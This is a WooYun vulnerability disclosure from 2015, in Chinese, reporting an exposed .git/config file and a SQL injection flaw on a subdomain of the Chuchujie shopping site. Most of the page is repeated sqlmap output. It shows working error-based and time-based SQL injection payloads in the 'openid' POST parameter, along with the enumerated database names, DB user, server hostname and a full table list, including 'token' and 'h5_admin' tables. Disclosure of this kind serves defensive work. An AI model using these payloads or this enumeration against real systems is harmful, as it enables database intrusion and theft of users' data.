楚楚街注入一枚+配置不当一枚 | wooyun-2015-0154010| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154010

漏洞标题：楚楚街注入一枚+配置不当一枚

漏洞作者：爱上平顶山

提交时间：2015-11-19 16:43

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-19：细节已通知厂商并且等待厂商处理中
2015-11-23：厂商已经确认，细节仅向厂商公开
2015-12-03：细节向核心白帽子及相关领域专家公开
2015-12-13：细节向普通白帽子公开
2015-12-23：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

半月没上网了
打卡。

详细说明：

醋溜科技
1、
Git 配置一枚
http://www.culiu.org/.git/config

[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	fetch = +refs/heads/*:refs/remotes/origin/*
	url = git@git.culiu.org:shop/culiuorg.git
[branch "master"]
	remote = origin
	merge = refs/heads/master

2、
注入
http://xingzuo.chuchujie.com/
存在大量注入点

sqlmap identified the following injection points with a total of 240 HTTP(s) requests:
---
Place: POST
Parameter: openid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: did=10&openid=2' AND (SELECT 6889 FROM(SELECT COUNT(*),CONCAT(0x3a706c793a,(SELECT (CASE WHEN (6889=6889) THEN 1 ELSE 0 END)),0x3a6567673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ojle'='Ojle&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: did=10&openid=2' AND SLEEP(5) AND 'BVIx'='BVIx&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: openid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: did=10&openid=2' AND (SELECT 6889 FROM(SELECT COUNT(*),CONCAT(0x3a706c793a,(SELECT (CASE WHEN (6889=6889) THEN 1 ELSE 0 END)),0x3a6567673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ojle'='Ojle&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: did=10&openid=2' AND SLEEP(5) AND 'BVIx'='BVIx&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
available databases [5]:
[*] astro
[*] information_schema
[*] mobwars
[*] mobwarstest
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: openid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: did=10&openid=2' AND (SELECT 6889 FROM(SELECT COUNT(*),CONCAT(0x3a706c793a,(SELECT (CASE WHEN (6889=6889) THEN 1 ELSE 0 END)),0x3a6567673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ojle'='Ojle&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: did=10&openid=2' AND SLEEP(5) AND 'BVIx'='BVIx&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
database management system users [1]:
[*] 'xingzuouser1'@'%'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: openid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: did=10&openid=2' AND (SELECT 6889 FROM(SELECT COUNT(*),CONCAT(0x3a706c793a,(SELECT (CASE WHEN (6889=6889) THEN 1 ELSE 0 END)),0x3a6567673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ojle'='Ojle&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: did=10&openid=2' AND SLEEP(5) AND 'BVIx'='BVIx&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: openid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: did=10&openid=2' AND (SELECT 6889 FROM(SELECT COUNT(*),CONCAT(0x3a706c793a,(SELECT (CASE WHEN (6889=6889) THEN 1 ELSE 0 END)),0x3a6567673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ojle'='Ojle&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: did=10&openid=2' AND SLEEP(5) AND 'BVIx'='BVIx&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: openid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: did=10&openid=2' AND (SELECT 6889 FROM(SELECT COUNT(*),CONCAT(0x3a706c793a,(SELECT (CASE WHEN (6889=6889) THEN 1 ELSE 0 END)),0x3a6567673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ojle'='Ojle&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: did=10&openid=2' AND SLEEP(5) AND 'BVIx'='BVIx&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
@@version:    '5.1.54-CDB-3.0.4'
@@HOSTNAME:    'TENCENT64.site'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: openid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: did=10&openid=2' AND (SELECT 6889 FROM(SELECT COUNT(*),CONCAT(0x3a706c793a,(SELECT (CASE WHEN (6889=6889) THEN 1 ELSE 0 END)),0x3a6567673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ojle'='Ojle&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: did=10&openid=2' AND SLEEP(5) AND 'BVIx'='BVIx&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
current database:    'astro'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: openid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: did=10&openid=2' AND (SELECT 6889 FROM(SELECT COUNT(*),CONCAT(0x3a706c793a,(SELECT (CASE WHEN (6889=6889) THEN 1 ELSE 0 END)),0x3a6567673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ojle'='Ojle&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: did=10&openid=2' AND SLEEP(5) AND 'BVIx'='BVIx&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
Database: astro
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| astro_dongtai            | 14644779 |
| astro_visit              | 9695719 |
| fanstatus                | 9328794 |
| astro_info1              | 653417  |
| astro_info9              | 653215  |
| astro_info7              | 651855  |
| astro_info5              | 651035  |
| astro_infoD              | 650336  |
| astro_infoF              | 649568  |
| astro_info3              | 649356  |
| astro_infoB              | 648393  |
| astro_info4              | 647685  |
| astro_info6              | 647680  |
| astro_infoA              | 647499  |
| astro_message            | 647063  |
| astro_infoE              | 647047  |
| astro_info0              | 646785  |
| astro_info2              | 646719  |
| astro_info8              | 646230  |
| astro_infoC              | 646000  |
| astro_msgid              | 620519  |
| token                    | 495402  |
| astro_album9             | 63775   |
| astro_album1             | 63705   |
| astro_album7             | 63530   |
| astro_albumD             | 63491   |
| astro_album0             | 63340   |
| astro_albumF             | 63315   |
| astro_album3             | 63306   |
| astro_album5             | 63289   |
| astro_albumA             | 63262   |
| astro_album4             | 63179   |
| astro_albumB             | 63128   |
| astro_albumC             | 63042   |
| astro_album2             | 63024   |
| astro_album6             | 63022   |
| astro_albumE             | 62884   |
| astro_album8             | 62874   |
| via                      | 33298   |
| push                     | 31888   |
| h5_tongji                | 24994   |
| astro_dayyunshi          | 18204   |
| astro_dayyunshi20130411  | 13824   |
| astro_dayyunshi_20141224 | 13824   |
| astro_dayyunshi_20120712 | 8760    |
| astro_dayyunshi_bak      | 8760    |
| astro_tongjiclick        | 6982    |
| astro_connect8           | 6642    |
| astro_connectA           | 6621    |
| astro_connect4           | 6615    |
| astro_connect1           | 6610    |
| astro_connect2           | 6598    |
| astro_connect9           | 6592    |
| astro_connect5           | 6591    |
| astro_connect0           | 6579    |
| astro_connectB           | 6568    |
| astro_connectF           | 6558    |
| astro_connect6           | 6514    |
| astro_connectE           | 6502    |
| astro_connect7           | 6495    |
| astro_connectC           | 6474    |
| astro_connectD           | 6444    |
| astro_connect3           | 6405    |
| astro_peidui2            | 3180    |
| h5_tg                    | 2975    |
| h5_all                   | 2934    |
| astro_weekyunshi         | 2117    |
| tguang                   | 1769    |
| missionover              | 1261    |
| h5_longworks             | 715     |
| h5_vote                  | 693     |
| h5_rank                  | 692     |
| h5_test1                 | 681     |
| h5_test1_item            | 681     |
| astro_monthyunshi        | 489     |
| addstar_sys              | 168     |
| h5_cartoon               | 153     |
| astro_yearyunshi         | 48      |
| record_data              | 30      |
| astro_infotmp            | 12      |
| astro_peidui             | 12      |
| astro_todaysign          | 12      |
| adinfo                   | 11      |
| addata                   | 9       |
| astro_agreen             | 9       |
| h5_admin                 | 9       |
| astro_meiwen             | 1       |
| astro_sys                | 1       |
+--------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: openid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: did=10&openid=2' AND (SELECT 6889 FROM(SELECT COUNT(*),CONCAT(0x3a706c793a,(SELECT (CASE WHEN (6889=6889) THEN 1 ELSE 0 END)),0x3a6567673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ojle'='Ojle&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: did=10&openid=2' AND SLEEP(5) AND 'BVIx'='BVIx&openkey=&toopenid=000000000000000000000000005E2FBF
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
Database: astro
Table: h5_admin

漏洞证明：

···

修复方案：

改。

版权声明：转载请注明来源爱上平顶山@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-11-23 15:58

厂商回复：

感谢通知，我们会立刻处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154010

漏洞标题：楚楚街注入一枚+配置不当一枚

相关厂商：醋溜科技

漏洞作者：爱上平顶山

提交时间：2015-11-19 16:43

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源爱上平顶山@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154010

漏洞标题：楚楚街注入一枚+配置不当一枚

相关厂商：醋溜科技

漏洞作者： 爱上平顶山

提交时间：2015-11-19 16:43

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154010"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 爱上平顶山@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：爱上平顶山

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源爱上平顶山@乌云